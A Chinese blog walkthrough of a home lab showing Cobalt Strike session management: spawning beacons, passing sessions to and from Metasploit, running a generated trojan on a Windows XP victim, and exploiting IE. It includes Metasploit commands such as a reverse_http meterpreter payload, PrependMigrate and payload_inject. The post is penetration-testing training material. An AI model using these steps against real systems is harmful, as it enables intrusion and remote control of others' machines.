Cobalt Strike 会话管理

测试环境

系统服务ip
kaliteamserver192.168.0.104
kalimetasploit192.168.0.134
xpvictim192.168.0.158
win10victim192.168.0.143

会话管理

1.cobalt strike派生会话

自身增加会话

或者在其他的teamserver做备份会话

先 创建一个新的监听器

派生一个会话到端口6666

可以看到工具终端已经执行

这里会显示多了出来

 再来派生到6666端口

大概过一分钟,就会多了一个会话

 把所有会话转到metasploit主机服务

转到【team20】 http-beacon

换端口8888

所有到刚刚选择的8888端口

2.cobalt strike派生metasploit会话

先在kali里面打开msf

创建外部监听器,与metasploit交互  。因为metasploit用的tcp,所以这也是tcp   

 

过一分钟,可以在kali中看到二个session

 3.metasploit生成木马与cobalt strike会话

在kali中生成木马文件

在cobalt strike新建监听器

把生成的木马shell.exe放到windows xp中,然后打开它,在工具中会返回机子会话信息 

 4.metasploit使用溢出exp与cobalt strike会话

show options

设置SRVHOST

 然后show payload,然后set payload windows/meterpreter/reverse_http

 然后show options看下参数有无错误

然后设置payload的参数

set LHOST 192.168.0.104

set lport 8888

set disablepayloadhandler True

set PrependMigrate true

set disablepayloadhandler True

将DisablePayLoadHandler设置为true。这告诉metasploit框架,它不需要在metasploit框架内创建处理程序来服务有效负载连接。

set PrependMigrate true

 这个选项告诉metasploit框架修改stager,以便在利用之后立即迁移到另一个进程。此选项对于客户端攻击非常重要。它允许您的会话在被利用的应用程序奔溃或关闭存活。

 复制该url到IE浏览器中执行,kali这边会加载 VBS stager 注:该链接带有攻击代码

在工具中会显示多了一个主机信息即产生一个会话

 5.metasploit session派生会话给 cobalt strike

 首先产生sessions,用的是IE浏览器的漏洞

先把前面这二个模块改回来

改成tcp协议,然后show options

 改lhost和lport,然后show options

同样把url放到IE浏览器中访问,看有无sessions返回

为产生会话在工具中,还需设置

 

 use exploit/windows/local/payload_inject   

 set session 3

set payload windows/meterpreter/reverse_http

上面set lhost设置错误,应该改设端口,下面开始重新设置

设置完毕

 这时在工具中会多了一个主机会话信息

还可以再产生一个会话

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值